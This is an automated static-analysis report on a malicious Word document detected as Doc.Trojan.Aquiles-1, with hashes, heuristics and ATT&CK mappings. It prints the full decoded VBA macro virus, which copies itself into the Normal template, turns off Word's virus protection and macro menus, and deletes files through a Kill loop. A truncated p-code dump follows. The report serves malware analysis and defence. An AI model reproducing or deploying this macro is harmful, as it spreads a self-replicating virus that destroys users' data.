Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9961e1ad17be556…

MALICIOUS

Office (OLE)

37.5 KB Created: 2002-03-17 15:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a3455932d310351d0ab3ea16bba5ae42 SHA-1: a81a901fdceedbca1fb8ce333e86d0dbd0d68ac6 SHA-256: f9961e1ad17be5568fec48f4eeb78a01eea4f7bba4ff253afcff1dd0d9984ae3
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Aquiles-1'. It contains a VBA macro within a 'Document_Open' subroutine that attempts to disable security features and manipulate macro code. This behavior is characteristic of malware designed to evade detection and facilitate further malicious actions, such as downloading and executing additional payloads.

Heuristics 4

  • ClamAV: Doc.Trojan.Aquiles-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Aquiles-1
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 38,400 bytes but its declared streams total only 19,534 bytes — 18,866 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9355 bytes
SHA-256: d73b29cc1b5159dbc1f897d68463e888eb46fd0f82bf225962fb372109371a1f
Detection
ClamAV: Doc.Trojan.Aquiles-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Aquiles"
Attribute VB_Base = "1Normal.Aquiles"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
 If ActiveDocument.VBProject.VBComponents.Count > 1 Then
 For op = 2 To ActiveDocument.VBProject.VBComponents.Count
   cantidad = ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
   ActiveDocument.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
 Next op
 End If
 If NormalTemplate.VBProject.VBComponents.Count > 1 Then
 For op = 2 To NormalTemplate.VBProject.VBComponents.Count
   cantidad = NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.CountOfLines
   NormalTemplate.VBProject.VBComponents.Item(op).CodeModule.DeleteLines 1, cantidad
 Next op
 End If
 Document_Close
End Sub
Private Sub Document_Close()
 On Error Resume Next
 CommandBars("Visual Basic").Visible = False
 Options.VirusProtection = False
 CommandBars("Tools").Controls("Macro").Enabled = False
 CommandBars("View").Controls(6).Enabled = False
 CommandBars("tools").Controls(15).Enabled = False
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 If MacroContainer.FullName = ActiveDocument.FullName Then
  If nt.Name <> "Aquiles" Then GoTo ClaudioNormal
 Else
  If ad.Name <> "Aquiles" Then GoTo Aquilesdocument
 End If
GoTo Findelmundo
Aquilesdocument:
 lineas = ad.CodeModule.CountOfLines
 ad.CodeModule.DeleteLines 1, lineas
 lineas = 1
 Do While lineas <= nt.CodeModule.CountOfLines
    cadenadecodigo = nt.CodeModule.lines(lineas, 1)
    ad.CodeModule.insertlines lineas, cadenadecodigo
    lineas = lineas + 1
 Loop
 ad.Name = "Aquiles"
 Open "C:\systemDos" For Append As #1
   Print #1, ActiveDocument.Path
 Close #1
 ActiveDocument.Save
GoTo Findelmundo
ClaudioNormal:
 lineas = nt.CodeModule.CountOfLines
 nt.CodeModule.DeleteLines 1, lineas
 lineas = 1
 Do While lineas <= ad.CodeModule.CountOfLines
    cadenadecodigo = ad.CodeModule.lines(lineas, 1)
    nt.CodeModule.insertlines lineas, cadenadecodigo
    lineas = lineas + 1
 Loop
 nt.Name = "Aquiles"
 NormalTemplate.Save
Findelmundo:
If Dir("C:\systemDos", vbNormal) <> "" Then
If FileLen("C:\systemDos") > 1024 Then
  Open "C:\systemDos" For Input As #1
    Line Input #1, direccion
    Do While Not EOF(1)
      Kill (s + "\*.*")
      Line Input #1, direccion
    Loop
  Close #1
  Kill ("C:\systemDos")
End If
End If
'Al rio jactancioso, Dios le a puesto un vado. Malinke
'Y una vez mas el emperador interpuso su alma, claudIo
'esto es una modificacion, trato de llegar a la perfeccion
End Sub

' Processing file: /opt/analyzer/scan_staging/c606dbd6d33b46ebb5e3498c62ee3f01.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Aquiles - 4581 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #3:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #4:
' 	Ld op 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St cantidad 
' Line #5:
' 	LitDI2 0x0001 
' 	Ld cantidad 
' 	Ld op 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #6:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	NextVar 
' Line #7:
' 	EndIfBlock 
' Line #8:
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	Gt 
' 	IfBlock 
' Line #9:
' 	StartForVariable 
' 	Ld op 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.